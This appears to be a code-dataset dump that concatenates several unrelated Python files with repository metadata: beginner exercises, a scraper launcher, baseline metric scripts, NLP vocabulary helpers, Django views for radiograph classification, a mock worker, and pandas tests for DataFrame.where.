seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
40695035291 | def max_num(num1, num2, num3):
    # Return the largest of the three numbers.
    # Ties resolve toward num1 first, then num2.
    if num1 >= num2 and num1 >= num3:
        return num1
    elif num2 >= num1 and num2 >= num3:
        return num2
    else:
        return num3
# Demo: prints 7.
print(max_num(7, 4, 5))
def is_weird(n):
    """Print the "weird"/"not weird" classification of n (HackerRank style).

    Odd n -> "Weird"; even n in [2, 5] -> "Not Weird"; even n in
    [6, 20] -> "Weird"; even n > 20 -> "Not Weird".  Even n below 2
    prints nothing.  Always returns None; output goes to stdout.
    """
    if n % 2 != 0:
        print("Weird")
        return
    # n is even from here on.
    if 2 <= n <= 5:
        print("Not Weird")
    elif 6 <= n <= 20:
        print("Weird")
    elif n > 20:
        print("Not Weird")
# Demo: prints "Not Weird" then None (the function has no return value).
print(is_weird(4))
# if __name__ == '__main__':
# n = int(input().strip())
# if n % 2 != 0:
# print("Weird")
# elif n % 2 == 0 and n in range(2,5):
# print("Not weird")
# elif n % 2 == 0 and n in range(6,20):
# print("Weird")
# else:
# print("Not Weird") | tsabz/python_practice | ifStatements_comarisons.py | ifStatements_comarisons.py | py | 772 | python | en | code | 0 | github-code | 90 |
1131480921 | import requests, bs4, pandas, time
import Immobiliare, Tuttocasa
def start():
    """Prompt for a supported site and a city, then run that scraper.

    NOTE(review): Immobiliare and Tuttocasa are imported *modules*, so
    calling them like functions (Immobiliare(city)) will raise
    TypeError at runtime — confirm the intended entry point (e.g.
    Immobiliare.scrape(city)).
    NOTE(review): the retry prompt does not apply .lower(), so a
    mixed-case answer like "Immobiliare" loops forever — confirm.
    """
    # Shared scrape state, reset again at the end of each run.
    global city, title, price, par
    title, price, par = [], [], []
    seek = input('Enter the name of the website to scrape: ').lower()
    # Keep prompting until a supported site name is entered.
    while seek not in ['immobiliare', 'tuttocasa']:
        print('\n\nYour choice is unavailable.')
        seek = input('\nPlease enter the name of another website: ')
    city = input('Enter the city: ')
    if seek == 'immobiliare':
        Immobiliare(city)
    elif seek == 'tuttocasa':
        Tuttocasa(city)
    # Clear the collected data so a repeated call starts fresh.
    title, price, par = [], [], []
    city = ''
start()
| Merk02/Web-Scraping | Tuttocasa.py | Tuttocasa.py | py | 593 | python | en | code | 0 | github-code | 90 |
7919852022 | import os
import numpy as np
import pandas as pd
from sklearn.metrics import accuracy_score, confusion_matrix, f1_score
# task = "sentiment_analysis"
task = "risk_profiling"  # which task's test split to score
# Baseline selector: "baseline_neutral" predicts class 2 everywhere;
# switch to "baseline_random" to sample uniformly from {0, 1, 2}.
direc = f"results/{task}/baseline_neutral/preds"
# direc = f"results/{task}/baseline_random/preds"
if __name__ == "__main__":
    np.random.seed(42)  # make the random baseline reproducible
    # train_df = pd.read_csv("../data/train.csv")
    test_df = pd.read_csv(f"../data/{task}/test.csv")
    # X_train = train_df
    X_test = test_df
    # Y_train = train_df["label"]
    Y_test = test_df["label"]
    # (array([0, 1, 2]), array([21, 28, 13]))
    if "random" in direc:
        # Uniform random predictions over the three classes.
        preds = np.random.randint(low=0, high=3, size=Y_test.shape[0])
    else:
        preds = np.ones(Y_test.shape[0]) * 2  # neutral
    if not os.path.exists(direc):
        os.makedirs(direc)
    # Persist each metric to its own text file under the preds dir.
    with open(f"{direc}/acc.txt", "w") as f:
        f.write(str(accuracy_score(Y_test, preds)))
    with open(f"{direc}/f1_weighted.txt", "w") as f:
        f.write(str(f1_score(Y_test, preds, average="weighted")))
    with open(f"{direc}/f1_macro.txt", "w") as f:
        f.write(str(f1_score(Y_test, preds, average="macro")))
    with open(f"{direc}/confusion_matrix.txt", "w") as f:
        f.write(str(confusion_matrix(Y_test, preds)))
| gchhablani/financial-sentiment-analysis | get_baseline.py | get_baseline.py | py | 1,250 | python | en | code | 2 | github-code | 90 |
12330760766 | import collections
from contextlib import contextmanager
import io
import re
import numpy
import chainer
from chainer.backends import cuda
def normalize_text(text):
    """Strip leading and trailing whitespace from *text* and return it."""
    stripped = text.strip()
    return stripped
def make_vocab(dataset, max_vocab_size=20000, min_freq=2):
    """Build a token -> id vocabulary from (tokens, label) pairs.

    Ids 0 and 1 are reserved for '<eos>' and '<unk>'.  Remaining tokens
    are added by descending frequency (ties broken alphabetically)
    until max_vocab_size entries exist or frequency drops below
    min_freq.
    """
    freq = collections.defaultdict(int)
    for tokens, _ in dataset:
        for tok in tokens:
            freq[tok] += 1
    vocab = {'<eos>': 0, '<unk>': 1}
    by_rank = sorted(freq.items(), key=lambda kv: (-kv[1], kv[0]))
    for word, count in by_rank:
        if len(vocab) >= max_vocab_size or count < min_freq:
            break
        vocab[word] = len(vocab)
    return vocab
def read_vocab_list(path, max_vocab_size=20000):
    """Read one token per line from *path* and return a token -> id map.

    Ids 0 and 1 are reserved for '<eos>' and '<unk>'.  Blank lines and
    duplicates are skipped; reading stops once max_vocab_size entries
    exist.
    """
    vocab = {'<eos>': 0, '<unk>': 1}
    with io.open(path, encoding='utf-8', errors='ignore') as fp:
        for raw in fp:
            word = raw.strip()
            if word and word not in vocab:
                vocab[word] = len(vocab)
            if len(vocab) >= max_vocab_size:
                break
    return vocab
def make_array(tokens, vocab, add_eos=True):
    """Map *tokens* to vocabulary ids as an int32 numpy array.

    Tokens missing from *vocab* map to the '<unk>' id; when add_eos is
    true the '<eos>' id is appended.
    """
    unknown = vocab['<unk>']
    ids = [vocab.get(tok, unknown) for tok in tokens]
    if add_eos:
        ids.append(vocab['<eos>'])
    return numpy.array(ids, numpy.int32)
def transform_to_array(dataset, vocab, with_label=True):
    """Convert a tokenized dataset into id arrays.

    With labels, each item becomes (id array, one-element int32 label
    array); otherwise each item is just the id array.
    """
    if not with_label:
        return [make_array(tokens, vocab) for tokens in dataset]
    return [(make_array(tokens, vocab), numpy.array([label], numpy.int32))
            for tokens, label in dataset]
def convert_seq(batch, device=None, with_label=True):
    """Move a minibatch to the requested device for the model.

    Args:
        batch: list of (id array, label array) pairs when with_label is
            true, otherwise a list of id arrays.
        device: None to leave arrays untouched, a negative id for CPU,
            or a GPU id.  On GPU the arrays are concatenated, moved in
            a single transfer, then split back on-device — cheaper than
            one copy per array.
        with_label: whether batch items carry labels.

    Returns:
        {'xs': ..., 'ys': ...} when with_label is true, otherwise just
        the list of converted arrays.
    """
    def to_device_batch(batch):
        if device is None:
            return batch
        elif device < 0:
            return [chainer.dataset.to_device(device, x) for x in batch]
        else:
            # Single host->GPU transfer, then split at the boundaries
            # given by the cumulative lengths of all but the last array.
            xp = cuda.cupy.get_array_module(*batch)
            concat = xp.concatenate(batch, axis=0)
            sections = numpy.cumsum([len(x)
                                     for x in batch[:-1]], dtype=numpy.int32)
            concat_dev = chainer.dataset.to_device(device, concat)
            batch_dev = cuda.cupy.split(concat_dev, sections)
            return batch_dev
    if with_label:
        # Labels are one-element arrays, so a flat concatenation works.
        ys = chainer.dataset.to_device(
            device, numpy.concatenate([y for _, y in batch]))
        return {'xs': to_device_batch([x for x, _ in batch]),
                'ys': ys}
    else:
        return to_device_batch([x for x in batch])
def calc_unk_ratio(dataset, vocab):
    """Return the fraction of '<unk>' ids among all tokens in *dataset*."""
    all_ids = numpy.concatenate([example[0] for example in dataset])
    return numpy.average(all_ids == vocab['<unk>'])
def load_stanfordcorenlp(uri):
    """Create a StanfordCoreNLP client from *uri*.

    Accepts either a local installation path or an http:// server URL;
    for a URL, a trailing ':port' is extracted and passed separately.
    """
    from stanfordcorenlp import StanfordCoreNLP
    port = None
    if uri.startswith('http://'):
        # Split "http://host:9000" into host part and numeric port.
        match = re.search(r':[0-9]+', uri)
        if match is not None:
            port = int(match.group(0)[1:])
            uri = uri.replace(match.group(0), '')
    return StanfordCoreNLP(uri, port=port)
@contextmanager
def get_tokenizer(stanfordcorenlp):
    """Yield a tokenize(text) -> list[str] callable.

    Falls back to whitespace splitting when no CoreNLP endpoint is
    given; otherwise keeps a CoreNLP connection open for the duration
    of the ``with`` block and yields its word tokenizer.
    """
    if stanfordcorenlp is None:
        def tokenize(text):
            return text.split()
        yield tokenize
    else:
        with load_stanfordcorenlp(stanfordcorenlp) as nlp:
            yield nlp.word_tokenize
| koreyou/SWEM-chainer | nlp_utils.py | nlp_utils.py | py | 3,180 | python | en | code | 0 | github-code | 90 |
43798932134 | from django.contrib import admin, messages
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render
from django.urls import reverse
from django.db.models import Q
import os
import environ
from django.core.paginator import Paginator
from azure.cognitiveservices.vision.customvision.prediction import CustomVisionPredictionClient
from msrest.authentication import ApiKeyCredentials
from musculoskeletal_radiograph_app.Form import CreatePatientForm, CreateRadiograph
from musculoskeletal_radiograph_app.models import Patient, Radiograph
# Create your views here.
def HomePage(request):
    """Render the static landing page."""
    return render(request, "Home/welcome.html")
def GetAllPatient(request):
    """List patients newest-first, 10 per page.

    A POST carries the search box value and matches it exactly
    (case-insensitively) against the patient id or surname; search
    results are rendered without pagination.
    """
    if request.method != "POST":
        patient_obj = Patient.objects.all().order_by('-id')
        p = Paginator(patient_obj, 10)
        page = request.GET.get('page')
        patients = p.get_page(page)
        # One character per page; presumably iterated by the template
        # to render page links — TODO confirm against the template.
        nums = "a" * patients.paginator.num_pages
        return render(request, "home/getall_patient.html", { "patients" : patients, 'nums' : nums })
    else:
        search = request.POST['search']
        if search:
            patient_obj = Patient.objects.filter(Q(id__iexact = search) | Q(sur_name__iexact = search))
            if patient_obj:
                return render(request, "home/getall_patient.html", { "patients" : patient_obj })
            else:
                messages.error(request, "No result found")
                return render(request, "home/getall_patient.html")
        else:
            # Empty search: fall back to an empty listing page.
            return render(request, "home/getall_patient.html")
def CreatePatient(request):
    """Register a new patient.

    GET renders an empty registration form.  POST validates the
    submitted data, creates the Patient and redirects to its detail
    page; on a database error the user is redirected back to the
    registration form with an error message.  An invalid form is
    re-rendered bound to the submitted data so field errors show.
    """
    if request.method != "POST":
        form = CreatePatientForm()
        return render(request, "home/create_patient.html", { "form":form } )
    form = CreatePatientForm(request.POST, request.FILES)
    if form.is_valid():
        first_name = form.cleaned_data["first_name"]
        sur_name = form.cleaned_data["sur_name"]
        phone_number = form.cleaned_data["phone_number"]
        email_address = form.cleaned_data["email_address"]
        # The photo is optional; store None when no file was uploaded.
        if len(request.FILES) != 0:
            image_url = request.FILES['image_url']
        else:
            image_url = None
        try:
            patient = Patient.objects.create(
                first_name = first_name,
                sur_name = sur_name,
                phone_number = phone_number,
                email_address = email_address,
                image_url = image_url
            )
        except Exception:
            # Was a bare `except:`; narrowed so system-exit signals are
            # not swallowed, and the try body now covers only the create.
            messages.error(request, "Error Occur When Trying to Register New Patient")
            return HttpResponseRedirect(reverse("register_patient"))
        messages.success(request, "Successfully Register a New Patient")
        return HttpResponseRedirect(reverse("get_patient", kwargs = { "patient_id": patient.id }))
    # Bug fix: the original built an empty form and then *called* it —
    # `CreatePatientForm()(request.POST, request.FILES)` — which raises
    # TypeError.  Bind the POST data in the constructor instead.
    form = CreatePatientForm(request.POST, request.FILES)
    return render(request, "home/create_patient.html", { "form": form })
def GetPatient(request, patient_id):
    """Patient detail page.

    GET shows the patient, an upload form, and a paginated (6 per
    page) list of their radiographs.  POST uploads a radiograph image,
    classifies it via an Azure Custom Vision endpoint (configured
    through environment variables) and stores the predicted label and
    probability.
    """
    if request.method!="POST":
        form = CreateRadiograph()
        patient_obj = Patient.objects.get(id = patient_id)
        radiograph = Paginator(Radiograph.objects.filter(patient_id = patient_obj).order_by('-id'), 6)
        page = request.GET.get('page')
        radiographs = radiograph.get_page(page)
        # One character per page; presumably iterated by the template
        # to render page links — TODO confirm.
        nums = "a" * radiographs.paginator.num_pages
        return render(request, "home/get_patient.html", { "form" : form, "patient" : patient_obj, "radiographs" : radiographs, 'nums' : nums } )
    else:
        form = CreateRadiograph(request.POST,request.FILES)
        if form.is_valid():
            try:
                if len(request.FILES) != 0:
                    image_url = request.FILES['image_url']
                else:
                    image_url = None
                patient_obj = Patient.objects.get(id = patient_id)
                # Get Configuration Settings
                env = environ.Env()
                environ.Env.read_env()
                prediction_endpoint = env('PredictionEndpoint')
                prediction_key = env('PredictionKey')
                project_id = env('ProjectID')
                model_name = env('ModelName')
                # Authenticate a client for the training API
                credentials = ApiKeyCredentials(in_headers = { "Prediction-key": prediction_key })
                prediction_client = CustomVisionPredictionClient(endpoint = prediction_endpoint, credentials = credentials)
                results = prediction_client.classify_image(project_id, model_name, image_url)
                # Loop over each label prediction and print any with probability > 50%
                # NOTE(review): this keeps the *last* tag above 0.5, not the
                # most probable one, and `predictions`/`accuracy` stay unbound
                # when no tag exceeds 0.5 (NameError, swallowed by the bare
                # except below) — confirm intended behaviour.
                for prediction in results.predictions:
                    if prediction.probability > 0.5:
                        predictions = prediction.tag_name
                        accuracy = prediction.probability
                radiograph = Radiograph.objects.create(
                    patient_id = patient_obj,
                    image_url = image_url,
                    prediction = predictions,
                    accuracy = accuracy
                )
                messages.success(request,"Musculoskeletal Radiograph Predicted Successfully")
                return HttpResponseRedirect(reverse("get_radiograph", kwargs = { "patient_id" : patient_id, "radiograph_id" : radiograph.id }))
            except:
                # NOTE(review): bare except hides every failure (network,
                # config, the NameError above); narrow to Exception and log.
                messages.error(request,"Failed to Predict Musculoskeletal Radiograph")
                return HttpResponseRedirect(reverse("get_patient", kwargs = { "patient_id" : patient_id }))
        else:
            form = CreateRadiograph(request.POST, request.FILES)
            return render(request, "home/get_patient.html", { "form": form })
def GetRadiograph(request, patient_id, radiograph_id):
    """Show a single radiograph (with its stored prediction) for a patient."""
    if request.method != "POST":
        patient_obj = Patient.objects.get(id = patient_id)
        radiograph = Radiograph.objects.get(patient_id = patient_obj, id = radiograph_id)
        return render(request, "home/get_radiograph.html", { "patient" : patient_obj, "radiograph" : radiograph } ) | olowoyinka/Abnormality_Detection_in_musculoskeletal_radiograph | musculoskeletal_radiograph_app/views.py | views.py | py | 6,272 | python | en | code | 0 | github-code | 90 |
36861290405 | """
DO NOT MODIFY
A simple worker that simulates the kind of task we run in the ETL
In chunks, it will write some text to output.txt
However, it may not be successful on every run
"""
from time import sleep
import random
import mock_db
text = 'Maestro is the best......\n\n'
def write_line(file_name: str, line: str) -> None:
    """
    Function to write the provided text to the provided file in append mode
    Args:
        file_name: the file to which to write the text
        line: text to write to the file
    """
    # Append mode so successive chunks accumulate rather than overwrite.
    with open(file_name, 'a') as f:
        f.write(line)
def worker_main(worker_hash: str, db) -> None:
    """
    Main routine of this worker that crashes on some probability.
    Writes some text to output.txt in chunks and sleeps after each
    Args:
        worker_hash: a random string we will use as an id for the running worker
        db: an instance of MockDB
    """
    # Simulate flakiness: ~20% of runs raise immediately before writing.
    CRASH_PROBABILITY = 0.2
    should_crash = random.random()
    if should_crash < CRASH_PROBABILITY:
        raise Exception("Crash")
    # Emit the module-level `text` in 5-character chunks, sleeping
    # between writes to mimic a slow, long-running task.
    CHUNK_SIZE = 5
    SLEEP_DURATION = 2
    cursor = 0
    while cursor < len(text):
        start = cursor
        end = min(cursor + CHUNK_SIZE, len(text))
        write_line('output.txt', text[start: end])
        sleep(SLEEP_DURATION)
        cursor += CHUNK_SIZE
| Jamiewu2/Interview-Handout | worker.py | worker.py | py | 1,341 | python | en | code | 1 | github-code | 90 |
1530620507 | #Python program to combine two dictionary adding values for common keys
# Combine two dictionaries; for common keys the second dict's value wins.
thisDict={"brand":"Ford","Model":"Mustang","year":1964}
print(thisDict)
feature={"color":"White","Symbol":"Horse","year":1964}
print(feature)
# Bump the shared key in both source dicts before merging.
thisDict["year"]=1984
feature["year"]=1984
newDict = {**thisDict, **feature}
print("The combination of two Dictionary is ",newDict)
| ManiNTR/python | CombineDictionaryCommonKey.py | CombineDictionaryCommonKey.py | py | 385 | python | en | code | 0 | github-code | 90 |
18523455499 | import itertools
# Read x triples and pick y of them maximising the sum of
# a*s1 + b*s2 + c*s3 over all 8 sign assignments (s in {+1, -1}).
x,y = map(int,input().split())
ab = []
for _ in range(x):
    a, b, c = (int(x) for x in input().split())
    ab.append([a, b, c])
ans = -1000000000000000000000  # effectively -infinity
# For each of the 2^3 sign assignments, score every triple under that
# assignment, then greedily take the y largest scores.
for i in itertools.product([1,-1], repeat=3):
    memo = []
    ansl = 0
    for j in ab:
        p = j[0]*i[0]+j[1]*i[1]+j[2]*i[2]
        memo.append(p)
    memo.sort(reverse=True)
    for k in range(y):
        ansl += memo[k]
    ans = max(ans, ansl)
print(ans) | Aasthaengg/IBMdataset | Python_codes/p03326/s035482367.py | s035482367.py | py | 446 | python | en | code | 0 | github-code | 90 |
34871163690 | from datetime import datetime
from hypothesis import given
import numpy as np
import pytest
from pandas.core.dtypes.common import is_scalar
import pandas as pd
from pandas import (
DataFrame,
DatetimeIndex,
Index,
Series,
StringDtype,
Timestamp,
date_range,
isna,
)
import pandas._testing as tm
from pandas._testing._hypothesis import OPTIONAL_ONE_OF_ALL
@pytest.fixture(params=["default", "float_string", "mixed_float", "mixed_int"])
def where_frame(request, float_string_frame, mixed_float_frame, mixed_int_frame):
    """Parametrized fixture yielding frames with several dtype mixes for where() tests."""
    if request.param == "default":
        # Plain all-float frame of deterministic random data.
        return DataFrame(
            np.random.default_rng(2).standard_normal((5, 3)), columns=["A", "B", "C"]
        )
    if request.param == "float_string":
        return float_string_frame
    if request.param == "mixed_float":
        return mixed_float_frame
    if request.param == "mixed_int":
        return mixed_int_frame
def _safe_add(df):
# only add to the numeric items
def is_ok(s):
return (
issubclass(s.dtype.type, (np.integer, np.floating)) and s.dtype != "uint8"
)
return DataFrame(dict((c, s + 1) if is_ok(s) else (c, s) for c, s in df.items()))
class TestDataFrameIndexingWhere:
def test_where_get(self, where_frame, float_string_frame):
    # For each column, df.where(cond, other) should match np.where,
    # and a raw boolean ndarray cond should behave like the frame cond.
    def _check_get(df, cond, check_dtypes=True):
        other1 = _safe_add(df)
        rs = df.where(cond, other1)
        rs2 = df.where(cond.values, other1)
        for k, v in rs.items():
            exp = Series(np.where(cond[k], df[k], other1[k]), index=v.index)
            tm.assert_series_equal(v, exp, check_names=False)
        tm.assert_frame_equal(rs, rs2)
        # dtypes
        if check_dtypes:
            assert (rs.dtypes == df.dtypes).all()

    # check getting
    df = where_frame
    if df is float_string_frame:
        # mixed str/int frames cannot be compared against a scalar at all
        msg = "'>' not supported between instances of 'str' and 'int'"
        with pytest.raises(TypeError, match=msg):
            df > 0
        return
    cond = df > 0
    _check_get(df, cond)
def test_where_upcasting(self):
    # upcasting case (GH # 2794): assigning a full row of 0 must not
    # change any column's original dtype
    df = DataFrame(
        {
            c: Series([1] * 3, dtype=c)
            for c in ["float32", "float64", "int32", "int64"]
        }
    )
    df.iloc[1, :] = 0
    result = df.dtypes
    expected = Series(
        [
            np.dtype("float32"),
            np.dtype("float64"),
            np.dtype("int32"),
            np.dtype("int64"),
        ],
        index=["float32", "float64", "int32", "int64"],
    )
    # when we don't preserve boolean casts
    #
    # expected = Series({ 'float32' : 1, 'float64' : 3 })
    tm.assert_series_equal(result, expected)
@pytest.mark.filterwarnings("ignore:Downcasting object dtype arrays:FutureWarning")
def test_where_alignment(self, where_frame, float_string_frame):
    # aligning: where() must align cond/other on index and columns
    def _check_align(df, cond, other, check_dtypes=True):
        rs = df.where(cond, other)
        for i, k in enumerate(rs.columns):
            result = rs[k]
            d = df[k].values
            # rows missing from cond after alignment count as False
            c = cond[k].reindex(df[k].index).fillna(False).values
            if is_scalar(other):
                o = other
            elif isinstance(other, np.ndarray):
                o = Series(other[:, i], index=result.index).values
            else:
                o = other[k].values
            new_values = d if c.all() else np.where(c, d, o)
            expected = Series(new_values, index=result.index, name=k)
            # since we can't always have the correct numpy dtype
            # as numpy doesn't know how to downcast, don't check
            tm.assert_series_equal(result, expected, check_dtype=False)
        # dtypes
        # can't check dtype when other is an ndarray
        if check_dtypes and not isinstance(other, np.ndarray):
            assert (rs.dtypes == df.dtypes).all()

    df = where_frame
    if df is float_string_frame:
        msg = "'>' not supported between instances of 'str' and 'int'"
        with pytest.raises(TypeError, match=msg):
            df > 0
        return
    # other is a frame
    cond = (df > 0)[1:]
    _check_align(df, cond, _safe_add(df))
    # check other is ndarray
    cond = df > 0
    _check_align(df, cond, (_safe_add(df).values))
    # integers are upcast, so don't check the dtypes
    cond = df > 0
    check_dtypes = all(not issubclass(s.type, np.integer) for s in df.dtypes)
    _check_align(df, cond, np.nan, check_dtypes=check_dtypes)
# Ignore deprecation warning in Python 3.12 for inverting a bool
@pytest.mark.filterwarnings("ignore::DeprecationWarning")
def test_where_invalid(self):
    # invalid conditions: shape mismatches and scalar conds must raise
    df = DataFrame(
        np.random.default_rng(2).standard_normal((5, 3)), columns=["A", "B", "C"]
    )
    cond = df > 0
    err1 = (df + 1).values[0:2, :]
    msg = "other must be the same shape as self when an ndarray"
    with pytest.raises(ValueError, match=msg):
        df.where(cond, err1)
    err2 = cond.iloc[:2, :].values
    other1 = _safe_add(df)
    msg = "Array conditional must be same shape as self"
    with pytest.raises(ValueError, match=msg):
        df.where(err2, other1)
    # scalar conds are rejected by mask with the same message
    with pytest.raises(ValueError, match=msg):
        df.mask(True)
    with pytest.raises(ValueError, match=msg):
        df.mask(0)
@pytest.mark.filterwarnings("ignore:Downcasting object dtype arrays:FutureWarning")
def test_where_set(self, where_frame, float_string_frame, mixed_int_frame):
# where inplace
def _check_set(df, cond, check_dtypes=True):
dfi = df.copy()
econd = cond.reindex_like(df).fillna(True).infer_objects(copy=False)
expected = dfi.mask(~econd)
return_value = dfi.where(cond, np.nan, inplace=True)
assert return_value is None
tm.assert_frame_equal(dfi, expected)
# dtypes (and confirm upcasts)x
if check_dtypes:
for k, v in df.dtypes.items():
if issubclass(v.type, np.integer) and not cond[k].all():
v = np.dtype("float64")
assert dfi[k].dtype == v
df = where_frame
if df is float_string_frame:
msg = "'>' not supported between instances of 'str' and 'int'"
with pytest.raises(TypeError, match=msg):
df > 0
return
if df is mixed_int_frame:
df = df.astype("float64")
cond = df > 0
_check_set(df, cond)
cond = df >= 0
_check_set(df, cond)
# aligning
cond = (df >= 0)[1:]
_check_set(df, cond)
def test_where_series_slicing(self):
# GH 10218
# test DataFrame.where with Series slicing
df = DataFrame({"a": range(3), "b": range(4, 7)})
result = df.where(df["a"] == 1)
expected = df[df["a"] == 1].reindex(df.index)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("klass", [list, tuple, np.array])
def test_where_array_like(self, klass):
    # see gh-15414: cond may be any boolean array-like, not only a frame
    df = DataFrame({"a": [1, 2, 3]})
    cond = [[False], [True], [True]]
    expected = DataFrame({"a": [np.nan, 2, 3]})
    result = df.where(klass(cond))
    tm.assert_frame_equal(result, expected)
    # also with two columns
    df["b"] = 2
    expected["b"] = [2, np.nan, 2]
    cond = [[False, True], [True, False], [True, True]]
    result = df.where(klass(cond))
    tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"cond",
[
[[1], [0], [1]],
Series([[2], [5], [7]]),
DataFrame({"a": [2, 5, 7]}),
[["True"], ["False"], ["True"]],
[[Timestamp("2017-01-01")], [pd.NaT], [Timestamp("2017-01-02")]],
],
)
def test_where_invalid_input_single(self, cond):
# see gh-15414: only boolean arrays accepted
df = DataFrame({"a": [1, 2, 3]})
msg = "Boolean array expected for the condition"
with pytest.raises(ValueError, match=msg):
df.where(cond)
@pytest.mark.parametrize(
"cond",
[
[[0, 1], [1, 0], [1, 1]],
Series([[0, 2], [5, 0], [4, 7]]),
[["False", "True"], ["True", "False"], ["True", "True"]],
DataFrame({"a": [2, 5, 7], "b": [4, 8, 9]}),
[
[pd.NaT, Timestamp("2017-01-01")],
[Timestamp("2017-01-02"), pd.NaT],
[Timestamp("2017-01-03"), Timestamp("2017-01-03")],
],
],
)
def test_where_invalid_input_multiple(self, cond):
# see gh-15414: only boolean arrays accepted
df = DataFrame({"a": [1, 2, 3], "b": [2, 2, 2]})
msg = "Boolean array expected for the condition"
with pytest.raises(ValueError, match=msg):
df.where(cond)
def test_where_dataframe_col_match(self):
df = DataFrame([[1, 2, 3], [4, 5, 6]])
cond = DataFrame([[True, False, True], [False, False, True]])
result = df.where(cond)
expected = DataFrame([[1.0, np.nan, 3], [np.nan, np.nan, 6]])
tm.assert_frame_equal(result, expected)
# this *does* align, though has no matching columns
cond.columns = ["a", "b", "c"]
result = df.where(cond)
expected = DataFrame(np.nan, index=df.index, columns=df.columns)
tm.assert_frame_equal(result, expected)
def test_where_ndframe_align(self):
msg = "Array conditional must be same shape as self"
df = DataFrame([[1, 2, 3], [4, 5, 6]])
cond = [True]
with pytest.raises(ValueError, match=msg):
df.where(cond)
expected = DataFrame([[1, 2, 3], [np.nan, np.nan, np.nan]])
out = df.where(Series(cond))
tm.assert_frame_equal(out, expected)
cond = np.array([False, True, False, True])
with pytest.raises(ValueError, match=msg):
df.where(cond)
expected = DataFrame([[np.nan, np.nan, np.nan], [4, 5, 6]])
out = df.where(Series(cond))
tm.assert_frame_equal(out, expected)
def test_where_bug(self):
# see gh-2793
df = DataFrame(
{"a": [1.0, 2.0, 3.0, 4.0], "b": [4.0, 3.0, 2.0, 1.0]}, dtype="float64"
)
expected = DataFrame(
{"a": [np.nan, np.nan, 3.0, 4.0], "b": [4.0, 3.0, np.nan, np.nan]},
dtype="float64",
)
result = df.where(df > 2, np.nan)
tm.assert_frame_equal(result, expected)
result = df.copy()
return_value = result.where(result > 2, np.nan, inplace=True)
assert return_value is None
tm.assert_frame_equal(result, expected)
def test_where_bug_mixed(self, any_signed_int_numpy_dtype):
# see gh-2793
df = DataFrame(
{
"a": np.array([1, 2, 3, 4], dtype=any_signed_int_numpy_dtype),
"b": np.array([4.0, 3.0, 2.0, 1.0], dtype="float64"),
}
)
expected = DataFrame(
{"a": [-1, -1, 3, 4], "b": [4.0, 3.0, -1, -1]},
).astype({"a": any_signed_int_numpy_dtype, "b": "float64"})
result = df.where(df > 2, -1)
tm.assert_frame_equal(result, expected)
result = df.copy()
return_value = result.where(result > 2, -1, inplace=True)
assert return_value is None
tm.assert_frame_equal(result, expected)
def test_where_bug_transposition(self):
# see gh-7506
a = DataFrame({0: [1, 2], 1: [3, 4], 2: [5, 6]})
b = DataFrame({0: [np.nan, 8], 1: [9, np.nan], 2: [np.nan, np.nan]})
do_not_replace = b.isna() | (a > b)
expected = a.copy()
expected[~do_not_replace] = b
msg = "Downcasting behavior in Series and DataFrame methods 'where'"
with tm.assert_produces_warning(FutureWarning, match=msg):
result = a.where(do_not_replace, b)
tm.assert_frame_equal(result, expected)
a = DataFrame({0: [4, 6], 1: [1, 0]})
b = DataFrame({0: [np.nan, 3], 1: [3, np.nan]})
do_not_replace = b.isna() | (a > b)
expected = a.copy()
expected[~do_not_replace] = b
with tm.assert_produces_warning(FutureWarning, match=msg):
result = a.where(do_not_replace, b)
tm.assert_frame_equal(result, expected)
def test_where_datetime(self):
# GH 3311
df = DataFrame(
{
"A": date_range("20130102", periods=5),
"B": date_range("20130104", periods=5),
"C": np.random.default_rng(2).standard_normal(5),
}
)
stamp = datetime(2013, 1, 3)
msg = "'>' not supported between instances of 'float' and 'datetime.datetime'"
with pytest.raises(TypeError, match=msg):
df > stamp
result = df[df.iloc[:, :-1] > stamp]
expected = df.copy()
expected.loc[[0, 1], "A"] = np.nan
expected.loc[:, "C"] = np.nan
tm.assert_frame_equal(result, expected)
def test_where_none(self):
# GH 4667
# setting with None changes dtype
df = DataFrame({"series": Series(range(10))}).astype(float)
df[df > 7] = None
expected = DataFrame(
{"series": Series([0, 1, 2, 3, 4, 5, 6, 7, np.nan, np.nan])}
)
tm.assert_frame_equal(df, expected)
# GH 7656
df = DataFrame(
[
{"A": 1, "B": np.nan, "C": "Test"},
{"A": np.nan, "B": "Test", "C": np.nan},
]
)
orig = df.copy()
mask = ~isna(df)
df.where(mask, None, inplace=True)
expected = DataFrame(
{
"A": [1.0, np.nan],
"B": [None, "Test"],
"C": ["Test", None],
}
)
tm.assert_frame_equal(df, expected)
df = orig.copy()
df[~mask] = None
tm.assert_frame_equal(df, expected)
def test_where_empty_df_and_empty_cond_having_non_bool_dtypes(self):
# see gh-21947
df = DataFrame(columns=["a"])
cond = df
assert (cond.dtypes == object).all()
result = df.where(cond)
tm.assert_frame_equal(result, df)
def test_where_align(self):
def create():
df = DataFrame(np.random.default_rng(2).standard_normal((10, 3)))
df.iloc[3:5, 0] = np.nan
df.iloc[4:6, 1] = np.nan
df.iloc[5:8, 2] = np.nan
return df
# series
df = create()
expected = df.fillna(df.mean())
result = df.where(pd.notna(df), df.mean(), axis="columns")
tm.assert_frame_equal(result, expected)
return_value = df.where(pd.notna(df), df.mean(), inplace=True, axis="columns")
assert return_value is None
tm.assert_frame_equal(df, expected)
df = create().fillna(0)
expected = df.apply(lambda x, y: x.where(x > 0, y), y=df[0])
result = df.where(df > 0, df[0], axis="index")
tm.assert_frame_equal(result, expected)
result = df.where(df > 0, df[0], axis="rows")
tm.assert_frame_equal(result, expected)
# frame
df = create()
expected = df.fillna(1)
result = df.where(
pd.notna(df), DataFrame(1, index=df.index, columns=df.columns)
)
tm.assert_frame_equal(result, expected)
def test_where_complex(self):
# GH 6345
expected = DataFrame([[1 + 1j, 2], [np.nan, 4 + 1j]], columns=["a", "b"])
df = DataFrame([[1 + 1j, 2], [5 + 1j, 4 + 1j]], columns=["a", "b"])
df[df.abs() >= 5] = np.nan
tm.assert_frame_equal(df, expected)
